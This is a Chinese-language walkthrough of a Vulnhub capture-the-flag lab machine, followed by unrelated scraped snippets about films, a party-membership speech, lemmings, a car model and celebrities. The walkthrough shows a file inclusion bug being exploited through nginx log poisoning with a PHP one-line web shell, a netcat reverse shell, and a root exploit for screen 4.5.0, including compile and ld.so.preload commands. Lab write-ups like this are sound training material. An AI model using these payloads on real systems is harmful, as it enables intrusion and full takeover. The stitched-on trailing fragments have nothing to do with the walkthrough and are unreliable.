Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。
vulnhub官网:https://www.vulnhub.com
1、直接从官网下载做好的虚拟机镜像文件(我下载的Mirror版本的);
2、解压会得到一个.ova的文件,然后在VMware中打开即可;
攻击机kali:192.168.2.19
DC靶机:192.168.2.22
(我两者都是用的桥接模式,更好都再做一个快照吧,以防万一)
虚拟机打开如下所示:
1、使用nmap扫描靶机,开放了111端口和80端口
2、111端口没有什么可以利用的点,只有80端口了,访问一下80端口
得知:网站使用的是Nginx的中间件,php语言
3、最终在Contact页面发现一个有交互的地方
4、尝试了很多的方式,由于自己的初心,没有发现问题所在,看了大佬的文章才知道。原来提交的内容之后,刷新thankyou.php页面,下方时间会有变化
5、之后使用DirBuster工具来扫描一下敏感文件
工具的大概使用介绍如下:
使用DirBuster扫描敏感文件,扫描到thankyou.php文件和footer文件,访问一下footer.php文件,发现该文件的内容就是之前提交之后下方显示的时间,这样的话,thankyou.php文件中应该包含了footer.php文件。所以thankyou.php文件应该是存在文件包含漏洞的。
1、在Contact.php页面中填写完表单提交,然后使用bp抓包发送到repeater模块
2、然后不断发包,查看数字也会变化
3、读取/etc/passwd文件,能够读取,看来是确实存在文件包含漏洞的。
4、读取nginx配置文件信息,发现nginx日志记录文件路径
#nginx配置文件路径 /etc/nginx/nginx.conf
#nginx日志文件路径
/var/log/nginx/error.log
/var/log/nginx/access.log
5、使用burp抓包发送到Repeater模块,然后修改file参数,传入一句话:file=<?php system($_GET['a']) ?>
6、进行包含时nginx的错误日志,利用一句话木马
1、利用一句话来反弹shell
? 首先在kali机上设置监听:nc -nlvp 1234
? 然后使用一句话 nc -e /bin/sh IP port 来反弹
成功反弹shell
2、 接受交互式的shell,因为之前得到的shell不太稳定,所以需要去拿到一个稳定的shell,使用命令:python -c "import pty;pty.spawn('/bin/bash')"
3、查看系统相关的一些信息
3、查找具有SUID权限的文件
这两个命令都可以查找
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
suid用来提权的一般有:Nmap 、Vim、 find、 Bash、 More 、Less、 Nano 、cp
但是都没有这些命令,有一个奇怪的screen-4.5.0,所以可以用这个来提权
1、使用命令searchsploit来查询漏洞利用的脚本
searchsploit screen 4.5.0
2、利用POC这个脚本,将其先复制出来
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh
3、查看一下脚本的使用
大概的步骤是分别将两部分的c代码编译为可执行文件,然后将其上传的靶机,按照提示的命令进行提权
之一步
?将之一部分的c代码放入libhax.c文件中进行编译
命令:gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
第二步
?将第二部分c代码放入rootshell.c文件中进行编译
命令:gcc -o /tmp/rootshell /tmp/rootshell.c
第三步
将编译好的可执行文件上传到靶机的tmp目录下
第四步
按照脚本提示的命令进行提权
步骤一:直接复制下面红线框中的代码,然后再终端中输入,就可以建立libhax.c和rootshell.c两个文件
步骤二:使用以下命令编译c文件
命令:gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
命令:gcc -o /tmp/rootshell /tmp/rootshell.c
步骤三:通过nc将文件传输到目标机的tmp文件夹(记得kali和靶机都是在tmp目录下进行操作,因为tmp目录的权限很大)
步骤四:
根据提权说明
首先输入命令:cd /etc
然后输入命令:umask 000
然后输入命令:screen -D -m -L ld.so.preload echo -ne? "\x0a/tmp/libhax.so"
然后输入命令:screen -ls
最后输入命令:/tmp/rootshell,成功提权
得到flag,在root目录下
1、端口扫描,熟悉常见的端口
2、目录扫描,工具有:御剑、dirsearch、DirBuster等等
3、文件包含漏洞及其利用
4、searchsploit命令的使用
5、screen提权
参考链接
https://www.cnblogs.com/sym945/p/13890266.html
https://blog.csdn.net/weixin_44740530/article/details/106401834?
本文导读目录: 1、黑客帝国4小女孩长大了? 2、《黑客帝国4》明年上映,有哪些我们熟悉面孔会回归? 3、黑客帝国有没有第四部? 4、22年后,《黑客帝国4》重归,母体和救世主谁才是最后的...
准备党员转正表态发言稿(党员转正发言材料) 尊重的诸位领导干部,尊重的诸位共产党员朋友,各位好!! 我201网四年初变成申请入党入党积极分子,后由于工作中必须激发,加入一线生产车间。2015年...
我们新学的第一,自然界的万事万物都是自然科学研究的对象。科学研究当然不能没有功利目的,但是功利目的不能太狭隘。对于旅鼠,自有一批动物学家和动物。 主要内容:《旅鼠之谜》为我们揭示了北极旅鼠的三大奥秘,...
“人间烟火,时刻潮流!”,爱奇艺自制潮流经营体验节目《潮流合伙人第二季》选址成都高新区铁像寺片区,STUDIOLITE(SLT)创始人凌晨受邀,带领团队为本季主理人陈伟霆,及合伙人欧阳娜娜、范丞丞、T...
最近很多网友都讨论斯柯达明锐这款车,斯柯达明锐是2007年上市的,至今已有9年时间,很多人说斯柯达明锐胎噪大,噪音处理不太好,而且刹车灵敏性差,悬挂偏软等!那么斯柯达明锐的最大缺点是什么,斯柯达明锐的...
2月28日晚,2020新浪微博之夜在上海举行,群星闪耀亮相。丁真为黄子韬送上自己准备的礼物——一枚戒指,黄子韬在台下晒照并配文:“感谢微博之夜感谢丁真突如其来的出现在我眼前...